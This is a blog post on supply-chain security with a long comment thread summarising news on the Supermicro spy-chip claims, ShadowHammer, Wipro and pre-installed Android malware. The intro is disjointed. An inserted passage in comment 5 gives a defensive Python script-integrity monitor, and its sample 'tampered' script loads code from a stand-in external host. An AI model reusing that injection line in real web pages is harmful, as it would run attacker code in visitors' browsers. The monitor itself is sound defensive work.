Supply Chain Security is the Whole Enchilada, But Who’s Willing to Pay for It? — Krebs on Security

You can have it fast, cheap, or secure — pick any two.

It seems to be possible as long as “secure” isn’t one of your choices.

“Our IT industry is inexorably international, and anyone involved in the process can subvert the security of the end product,” Schneier wrote.
We don’t often hear about intentional efforts to subvert the security of the technology supply chain simply because these incidents tend to get quickly classified by the military when they are discovered.
Indeed, noted security expert Bruce Schneier calls supply-chain security “an insurmountably hard problem.”

Most of the U.S. government’s efforts to police the global technology supply chain seem to be focused on preventing counterfeits — not finding secretly added spying components.

Finally, it’s not clear that private industry is up to the job, either. At least not yet.

Supply chain challenges definitely fit into category “things I can’t change”.


  1. Tomi Engdahl says:

    Joseph Bernstein / BuzzFeed News:
    Amazon canceled some ads on Bloomberg’s properties, sources say due to China spy chips story; sources: Apple did not invite Bloomberg to fall product event — Amazon pulled its fourth quarter advertisements on Bloomberg’s website, a move some within the media giant think is retribution …

    Amazon Has Pulled Its Ads From Bloomberg Over China Hack Story

    Sources say both Amazon and Apple are taking retributive measures against the outlet that alleged they were hacked by China.

  2. Tomi Engdahl says:

    Building a Proof of Concept Hardware Implant

    [Nicolas Oberli] of Kudelski Security wanted to do more than idly speculate, so he decided to come up with a model of how an implanted hardware espionage device could interact with the host system. He was able to do this with off the shelf hardware, meaning anyone who’s so inclined can recreate this “Hardware Implant Playset” in their own home lab for experimentation. Obviously this is not meant to portray a practical attack in terms of the hardware itself, but gives some valuable insight into how such a device might function.

    Build Your Own Hardware Implant

  3. Tomi Engdahl says:

    IFTLE 397: Malicious Embedded Chips? And TSMC Rides the Leading Edge

    Malicious Embedded Chips in our Mother Boards?

    Early October brought a report from Bloomberg that I have heard was the top tech story circulating at the DoD and DARPA.

    For years, articles about counterfeit chips, and our reliance on Asian-made chips – where they could be modified in ways to pass on information or allow hacks – have worried us. Now…. we’ve got something new to worry about.

    The 3rd party discovered that the servers customers installed in AWS’ networks to handle the video compression were assembled by Super Micro Computer, a San Jose CA company that also supplied the server motherboards. Nested on the servers’ motherboards, the testers found a tiny microchip, that wasn’t part of the boards’ original design.

    Amazon reported the discovery to U.S. authorities. Elemental’s servers were found in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. Investigators reportedly determined that the chips allowed the attackers to create a stealth doorway into any network that included the altered machines.

    Elemental was just one of the hundreds of Super Micro customers

    The FBI and the Office of the Director of National Intelligence, representing the CIA and NSA, declined to comment. While Apple and Amazon denied the Bloomberg report [link] Bloomberg defended its reporting, indicating that “…the companies’ denials are countered by six current and former senior national security officials, who in conversations that began during the Obama administration and continued under the Trump administration—detailed the discovery of the chips and the government’s investigation.

    One of those officials and two people inside AWS provided extensive information on how the attack played out at Elemental and Amazon; the official and one of the insiders also described Amazon’s cooperation with the government investigation. In addition to the three Apple insiders, four of the six U.S. officials confirmed that Apple was a victim. In all, 17 people confirmed the manipulation of Supermicro’s hardware and other elements of the attacks. The sources were granted anonymity because of the sensitive, and classified, nature of the information.”

    Certainly, if nothing else, these reports have opened eyes to the issue of not having the capability for packaging and assembly in the US for consumer products, as well as DoD applications.

  4. Tomi Engdahl says:

    Hardware Cyberattacks: How Worried Should You Be?

    How to fit hardware threats into your security model as hardware becomes smaller, faster, cheaper, and more complex.

  5. Tomi Engdahl says:

    Supply-chain attack on cryptocurrency exchange

    Latest ESET research shows just how far attackers will go in order to steal bitcoin from customers of one specific virtual currency exchange

    On November 3, attackers successfully breached StatCounter, a leading web analytics platform. This service is used by many webmasters to gather statistics on their visitors – a service very similar to Google Analytics.

    by compromising the StatCounter platform, attackers can inject JavaScript code in all websites that use StatCounter.

    Attackers modified the script at by adding a piece of malicious code
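The comment above describes the risk of a third-party script include: every site that embeds the analytics snippet runs whatever the provider's server currently serves, so a compromise of that one host lands on all of them. The following added example (not code from the original post, from StatCounter, or from ESET) shows a defender-side monitor for that situation: it pins a known-good copy of the remote script, computes an SRI-style integrity value, diffs a freshly fetched copy against the baseline, and flags any added line that references a host outside an allowlist. The script contents and host names are constructed stand-ins, not the real StatCounter code.

```python
"""Integrity monitor for a third-party script include (constructed example).

Assumptions (not from the original post): the site keeps a pinned copy of the
remote analytics script taken at deployment time, periodically re-fetches the
live copy, and alerts on any change. Fetching is out of scope here; the two
strings below stand in for the pinned copy and a tampered live copy.
"""
import base64
import difflib
import hashlib
import re

# Constructed stand-in for the analytics loader as pinned at deploy time.
BASELINE_SCRIPT = """\
var sc_project=12345;
var sc_invisible=1;
(function(){
  var s=document.createElement('script');
  s.src='https://analytics.example/counter.js';
  document.head.appendChild(s);
})();
"""

# Constructed stand-in for a tampered live copy: one appended line that pulls
# a second script from a host the site never approved.
TAMPERED_SCRIPT = BASELINE_SCRIPT + (
    "var s2=document.createElement('script');"
    "s2.src='https://cdn-stats.invalid/x.js';document.head.appendChild(s2);\n"
)

# Hosts the pinned script is allowed to reference.
ALLOWED_HOSTS = {"analytics.example"}

URL_HOST = re.compile(r"https?://([^/'\"\s]+)")


def sri_hash(content: str, algo: str = "sha384") -> str:
    """Return an SRI-style integrity value ('sha384-<base64 digest>')."""
    digest = hashlib.new(algo, content.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def check_script(baseline: str, current: str) -> dict:
    """Compare a freshly fetched copy against the pinned baseline.

    The report carries the expected and actual integrity values plus the exact
    lines added or removed, so an alert shows what changed, not just
    'hash mismatch'.
    """
    expected = sri_hash(baseline)
    actual = sri_hash(current)
    added, removed = [], []
    if actual != expected:
        diff = difflib.unified_diff(
            baseline.splitlines(), current.splitlines(), lineterm="", n=0
        )
        for line in diff:
            # Skip the ---/+++ file headers and @@ hunk headers.
            if line.startswith(("---", "+++", "@@")):
                continue
            if line.startswith("+"):
                added.append(line[1:])
            elif line.startswith("-"):
                removed.append(line[1:])
    return {
        "changed": actual != expected,
        "expected": expected,
        "actual": actual,
        "added": added,
        "removed": removed,
    }


def new_hosts(added_lines: list, allowed_hosts: set) -> set:
    """Return hosts referenced by added lines that are not on the allowlist.

    A new external host appearing in a script that previously only talked to
    the provider is the strongest single signal for this class of tampering.
    """
    found = set()
    for line in added_lines:
        for host in URL_HOST.findall(line):
            if host not in allowed_hosts:
                found.add(host)
    return found


if __name__ == "__main__":
    report = check_script(BASELINE_SCRIPT, TAMPERED_SCRIPT)
    print("changed:", report["changed"])
    print("added lines:", report["added"])
    print("unexpected hosts:", new_hosts(report["added"], ALLOWED_HOSTS))
```

Because a provider may legitimately update its script, treat a hash mismatch as an event to review and re-pin rather than an automatic block; the unexpected-host check is what separates a routine update from an injection like the one described above.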

  6. Tomi Engdahl says:

    Microsoft Finds Pirated Windows on Too Many New Computers
    Company also discovers malware and coin miners on these PCs

    Microsoft has conducted its own investigation on the Asian new PC market, only to discover an insane number of computers sold with a pirated Windows license.

    As reported by The Economic Times, Microsoft purchased PCs between May and July from Asian markets in an attempt to determine how many of them are shipped with counterfeit Windows licenses and malware pre-installed.

  7. Tomi Engdahl says:

    DUST Identity Emerges From Stealth to Protect Device Supply Chain

    Boston, MA-based start-up firm DUST Identity has emerged from stealth with $2.3 million seed funding led by Kleiner Perkins, with participation from New Science Ventures, Angular Ventures, and Castle Island Ventures. It was founded in 2018 by Ophir Gaathon (CEO), Jonathan Hodges (VP engineering) and Dirk Englund (board member).

    DUST, an anagram for ‘diamond unclonable security tag’, has developed a method to ensure the provenance and integrity of any object. Its purpose is to protect the physical supply chain from manufacture to installation, and during continued use. In essence, a very tiny spray of diamond particles is applied to any surface. The pattern created is random but unique to each object. This is scanned and recorded, and becomes the object’s fingerprint. Any physical attempt to tamper with the object disturbs the fingerprint and becomes known.

    The spray pattern is random by design. DUST takes the view that if it could predefine a pattern, then an adversary would be able to copy it. Instead it allows the vagaries of nature and the environment to create an unclonable unique pattern.

  8. Tomi Engdahl says:

    Security agencies warn of foreign espionage threat to company networks
    RCMP warns of ‘supply chain vulnerability’ — a back-door tactic to infiltrate systems

    Canadian companies should watch out when they use technology supplied by state-owned companies from countries that want to steal corporate secrets, the country’s security agencies have warned.

    The RCMP organized two workshops last March — one in Calgary, the other in Toronto — to raise awareness about threats to critical systems, including espionage and foreign interference, cyberattacks, terrorism and sabotage, newly disclosed documents show.

  9. Tomi Engdahl says:

    Super Micro Finds No Malicious Hardware in Motherboards

    Company examined equipment following allegations of a rogue chip

    Super Micro Computer Inc. told its customers in a letter Tuesday that a third-party firm didn’t find malicious hardware on its equipment, as the supplier of motherboards continued to dispute a report that its products had been sabotaged.

    “After thorough examination and a range of functional tests, the investigations firm found absolutely no evidence of malicious hardware on our motherboards,”

  10. Tomi Engdahl says:

    Supermicro Says It Found No Evidence of Malicious Chips

    Supermicro has faced allegations for months that some server motherboards it sold contained malicious chips that opened a backdoor into the data centers of major technology companies, including Apple and Amazon.

    The company came under scrutiny earlier this year after a Bloomberg report claimed that some Supermicro motherboards were carrying covert implants inserted in factories operated by the company’s Chinese contractors. Supermicro said that the firm it hired had found no evidence of malicious chips in a representative sample of its motherboards,

  11. Tomi Engdahl says:


  12. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Researchers find that weaknesses in Supermicro hardware would let an attacker leave a persistent and hidden backdoor on IBM’s cloud “bare-metal” servers — Other providers of bare-metal cloud computing might also be vulnerable to BMC hack. — More than five years …

    Supermicro hardware weaknesses let researchers backdoor an IBM cloud server
    Other providers of bare-metal cloud computing might also be vulnerable to BMC hack.

    More than five years have passed since researchers warned of the serious security risks that a widely used administrative tool poses to servers used for some of the most sensitive and mission-critical computing. Now, new research shows how baseboard management controllers, as the embedded hardware is called, threaten premium cloud services from IBM and possibly other providers.

  13. Tomi Engdahl says:

    Hackers Backdoor Cloud Servers to Attack Future Customers

    A new vulnerability dubbed Cloudborne can allow attackers to implant backdoor implants in the firmware or BMC of bare metal servers that survive client reassignment in bare metal and general cloud services, leading to a variety of attack scenarios.

    Organizations deploying critical high-value apps on bare metal servers through Infrastructure as a Service (IaaS) offerings consider it the best alternative to buying their own hardware because this allows for easy and quick scaling of cloud-based applications without the need of sharing the hardware with other users.

    While this generally means that an organization’s critical apps are always running on dedicated servers, the fact that those servers are reclaimed and re-assigned once the client no longer needs them exposes them to firmware weaknesses and vulnerabilities that can persist between customer assignments.

    Even though IBM and Eclypsium are already engaged in talks regarding the severity level of this vulnerability, other cloud vendors have yet to chime in on a discussion that could be going for a while, considering the implications of such security issues in the long term and the apparently extremely hard to implement fixes.

  14. Tomi Engdahl says:

    Hackers Can Plant Backdoors on Bare Metal Cloud Servers: Researchers

    Malicious actors could plant firmware backdoors on bare metal cloud servers and use them to disrupt applications, steal data, and launch ransomware attacks, firmware security company Eclypsium warned on Tuesday.

  15. Tomi Engdahl says:

    Supermicro Servers Can Be Easily Backdoored After All

    Last year, Bloomberg ran a report, saying Supermicro-supplied servers come with Chinese backdoors and that this may have been a reason for Apple to drop them in 2016; although Apple denied espionage concerns at the time. Although new research published today doesn’t exactly confirm Bloomberg’s report that Supermicro servers ship with pre-installed backdoors, it does point to the microcontrollers used by Supermicro and the firmware that comes with them being easily backdoored without detection.

    Supermicro’s “Parasitic Servers” Are Easily Exploitable
    Previous research had shown that baseboard management controllers (BMCs), which are motherboard-attached microcontrollers, can give extraordinary remote access to servers inside data centers. The management capability on these BMCs is provided via the Intelligent Platform Management Interface (IPMI), which in many ways is similar to Intel’s Management Engine and its Active Management Technology and poses the same large risks of allowing attackers to take over servers remotely.

  16. Tomi Engdahl says:

    Warning: ASUS Software Update Server Hacked to Distribute Malware

    CCleaner hack was one of the largest supply chain attacks that infected more than 2.3 million users with a backdoored version of the software in September 2017.

    Security researchers today revealed another massive supply chain attack that compromised over 1 million computers manufactured by Taiwan-based tech giant ASUS.

    A group of state-sponsored hackers last year managed to hijack ASUS Live automatic software update server between June and November 2018 and pushed malicious updates to install backdoors on over one million Windows computers worldwide.

  17. Tomi Engdahl says:

    ShadowHammer: Malicious updates for ASUS laptops

    Asus unwittingly pushed malware to 500k laptops after hack

  18. Tomi Engdahl says:

    Spyware sneaks into ‘million-ish’ Asus PCs via poisoned software updates, says Kaspersky
    Hackers were interested in 600 or so targets, it is claimed

    ASUS Live Update Infected with Backdoor in Supply Chain Attack

    A new advanced persistent threat (APT) campaign detected by Kaspersky Lab in January 2019 and estimated to have run between June and November 2018 has allegedly impacted over one million users who have downloaded the ASUS Live Update Utility on their computers.

    Kaspersky Lab’s Global Research and Analysis (GReAT) team named this malicious campaign Operation ShadowHammer and, as initially reported by Kim Zetter, it is supposed to have led to the backdoored version of ASUS Live Update being downloaded and installed by more than 57,000 Kaspersky users.

  19. Tomi Engdahl says:

    Some ASUS Updates Drop Backdoors on PCs in ‘Operation ShadowHammer’

    The attack appears to be associated with a China-backed APT actor.

    A supply-chain attack dubbed “Operation ShadowHammer” has been uncovered, targeting users of the ASUS Live Update Utility with a backdoor injection. The China-backed BARIUM APT is suspected to be at the helm of the project.

  20. Tomi Engdahl says:

    Wipro hacked, used as a springboard for more attacks

    Phishing attacks attempted against Wipro’s clients.

    Wipro, one of India’s largest IT outsourcing and consulting companies, has been used as a weapon against its own customers, security researchers are saying.

    Apparently an unknown, possibly state-sponsored attacker, has breached Wipro’s networks months ago, and then used it to conduct phishing attacks against Wipro’s clients.

  21. Tomi Engdahl says:

    Wipro Intruders Targeted Other Major IT Firms

    The crooks responsible for launching phishing campaigns that netted dozens of employees and more than 100 computer systems last month at Wipro, India’s third-largest IT outsourcing firm, also appear to have targeted a number of other competing providers, including Infosys and Cognizant, new evidence suggests. The clues so far suggest the work of a fairly experienced crime group that is focused on perpetrating gift card fraud.

  22. Tomi Engdahl says:

    Sergiu Gatlan / BleepingComputer:
    Kaspersky researchers say the supply-chain attack that infected ASUS and its PC update tool this year also affected six other companies, mostly in South Korea

    ShadowHammer Targets Multiple Companies, ASUS Just One of Them

    ASUS was not the only company targeted by supply-chain attacks during the ShadowHammer hacking operation as discovered by Kaspersky, with at least six other organizations having been infiltrated by the attackers.

    As further found out by Kaspersky’s security researchers, ASUS’ supply chain was successfully compromised by trojanizing one of the company’s notebook software updaters named ASUS Live Updater which eventually was downloaded and installed on the computers of tens of thousands of customers according to experts’ estimations.

    However, ASUS was not the only company which got its IT infrastructure infiltrated during Operation ShadowHammer given that the researchers were able to find a number of other malware samples that employed similar algorithms and were also signed with valid and legitimate certificates.

    The researchers also stated that “how many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.”

  23. Tomi Engdahl says:

    Analyzing C/C++ Runtime Library Code Tampering in Software Supply Chain Attacks

    For the past few years, the security industry’s very backbone — its key software and server components — has been the subject of numerous attacks through cybercriminals’ various works of compromise and modifications. Such attacks involve the original software’s being compromised via malicious tampering of its source code, its update server, or in some cases, both.

  24. Tomi Engdahl says:

    Tara Seals / Threatpost:
    Flashpoint says April Wipro attack was done by hackers who may have been operating under the radar since ’15, have the hallmarks of an advanced, organized group

    Wipro Attackers Have Operated Under the Radar for Years

    The adversaries have the hallmarks of an advanced, organized group, with well-established infrastructure.

    New details are emerging in the April attack on systems consulting behemoth Wipro, which saw its network hacked and used for mounting attacks on a dozen of its customers. In a fresh analysis of the indicators of compromise (IOCs), Flashpoint analysts said that the cyberattackers have actually been operating in the shadows for some time – and that the Wipro incident is only its latest effort.

  25. Tomi Engdahl says:

    Wipro Threat Actors Active Since 2015

    As more layers of the Wipro breach are peeled away, new intelligence about the actors behind the attack on one of India’s largest IT outsourcing and consulting organizations has emerged. Evidence uncovered by Flashpoint researchers links the threat actors to other malicious activity dating back to 2017, and possibly 2015, as well as the re-use of infrastructure from those older attacks.

    Also, many legitimate security applications were abused during this campaign. For example, the phishing templates used to ensnare victims inside Wipro match those provided by a security awareness training provider. The attackers also dropped ScreenConnect on the machines it compromised inside Wipro, and some of the domains used in the attack were hosting powerkatz and powersploit scripts.

  26. Tomi Engdahl says:


    A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer’s network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go.

  27. Tomi Engdahl says:

    They’re known as Barium, or sometimes ShadowHammer, ShadowPad, or Wicked Panda, depending on which security firm you ask.

  28. Tomi Engdahl says:

    A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree

    A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer’s network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go.

  29. Tomi Engdahl says:

    Data Sharing And Digital Threads

    Share product information with members of the supply chain without exposing your data.

    The benefits of digital threads
    A digital thread tracks the genealogy and data of a product—from each component right through to the end-product. Given their significant benefits, it is only a matter of time before digital threads become standard operating procedure in manufacturing supply chains. This will bring many benefits:

    Lower RMA costs: Through board-to-chip correlations, faster root cause analysis, running online RMA prevention rules, reducing No-Trouble-Found (NTF) rates and, in the worst case, implementing highly targeted recalls.
    Improved quality and time-to-quality: By reducing time to reach acceptable Defective-Parts-Per-Million (DPPM) goals for new products, creating an online quality link between chips and boards, and using advanced failure prediction techniques such as escape prevention and outlier detection.
    More efficient test processes: Via adaptive testing that uses component data to test “suspect” parts more and “perfect” parts less.
    Better system performance: By avoiding in-spec chips with marginal performance and pairing the right chips with the right board.

    But digital threads require data sharing
    The fundamental principle of a digital thread is that data is shared—inside the organization and with every company along the supply chain. For electronics manufacturers, that could mean data from each component’s fabrication and test phases, through assembly, inspection and rework and finally to usage data from the field.

    A data sharing hub
    The data sharing hub is a trusted entity that facilitates Machine Learning and analytics while hiding the “raw” data from the other members of the supply chain. It is only the insights derived from the data that are shared among the different parties. In the meantime, the hub has the visibility across the entire supply chain that is required to track down where issues stem from—issues that otherwise may have not been discovered until the very end of the supply chain.

  30. Tomi Engdahl says:

    Hackers Exploit ASUS Update Process to Install Backdoor

    The BlackTech cyber-espionage group has been performing man-in-the-middle (MitM) attacks on the update process of the ASUS WebStorage application to deliver the Plead backdoor to their targeted victims, ESET reports.

  31. Tomi Engdahl says:

    Can The Hardware Supply Chain Remain Secure?

    The growing number of threats are cause for concern, but is it really possible to slip malicious code into a chip?

  32. Tomi Engdahl says:

    Google Confirms Android Smartphone Security Backdoor

    Earlier this year, Forbes reported how a banking Trojan called Triada had been found on a bunch of brand new budget Android smartphones. Google has now confirmed that threat actors did, indeed, manage to compromise Android smartphones with the installation of a backdoor as part of a supply chain attack.

  33. Tomi Engdahl says:

    Brian Krebs / Krebs on Security:
    A deep dive on which vendor may be responsible for a supply chain attack that Google said resulted in pre-installed malware on budget Android devices — Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices.

    Tracing the Supply Chain Attack on Android

    Earlier this month, Google disclosed that a supply chain attack by one of its vendors resulted in malicious software being pre-installed on millions of new budget Android devices. Google didn’t exactly name those responsible, but said it believes the offending vendor uses the nicknames “Yehuo” or “Blazefire.” What follows is a deep dive into the identity of that Chinese vendor, which appears to have a long and storied history of pushing the envelope on mobile malware.

    The Shanghai Blazefire Network is part of a group of similarly-named Chinese entities in the “mobile phone pre-installation business and in marketing for advertisers’ products to install services through mobile phone installed software.”

    “At present, pre-installed partners cover the entire mobile phone industry chain, including mobile phone chip manufacturers, mobile phone design companies, mobile phone brand manufacturers, mobile phone agents, mobile terminal stores and major e-commerce platforms,” reads a descriptive blurb about the company.

    That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

    -Crack the restrictions imposed by the manufacturer on the mobile phone.
    -Research and master the android [operating] system
    -Reverse the root software to study the root of the android mobile phone
    -Research the anti-brushing and provide anti-reverse brushing scheme

  34. Tomi Engdahl says:

    How data-driven insurance can secure supply chain resilience

    Supply chain networks are more exposed to external disruptions than ever before. Next to cyber-attacks, adverse weather conditions are one of the biggest threats business operations can face, causing billions of losses. However, most companies are not well-prepared for natural or man-made disasters.

  35. Tomi Engdahl says:

    This proof-of-concept suggests that supply chain attacks may not be as expensive or difficult as many of us previously thought.

    Proof-of-Concept Spy Chips?

    Back at the tail end of last year Bloomberg published a piece called “The Big Hack,” claiming that a supply chain attack originating in China had affected almost 30 companies, including Apple, Amazon, and Super Micro. The story was immediately, and vehemently, denied by pretty much everyone

    Although nobody could find any evidence to suggest ‘The Big Hack’ was really happening, nobody denies that the idea of a supply chain hack is possible. In fact, it’s pretty much the worst possible nightmare scenario when it comes to security, because there’s no way to fix things other than to burn everything to the ground and start again. Which isn’t going to help for most people.

    However, while most of us argued that a supply chain attack was possible, we also argued that it was unlikely to happen in real life because of the difficulty involved in actually carrying it out.

    But at the CS3sthlm security conference, which will be held later this month in Stockholm, Sweden, security researcher Monta Elkins, the “Hacker-in-Chief” for FoxGuard Solutions, will present a proof-of-concept attack that can be implemented on a budget of under two hundred dollars and carried out on your lab bench at home.

  36. Tomi Engdahl says:

    An infographic about supply chain risk with a bunch of data points.

    It’s here – thank you!

  37. Tomi Engdahl says:

    35C3 – Modchips of the State

    Hardware implants and supply chain attacks have been in the news recently, but how feasible are they and what can we do about them? In this talk we’ll examine the design of a proof of concept SPI bus hardware implant that has similar capabilities to those described in the Bloomberg/Supermicro article as well as some countermeasures that we can use to try to detect these “modchips” and increase our trust in our systems

  38. Tomi Engdahl says:

    Security Risks In The Supply Chain
    Trojans, a dual supply chain and industry consolidation are creating new threats for chipmakers.

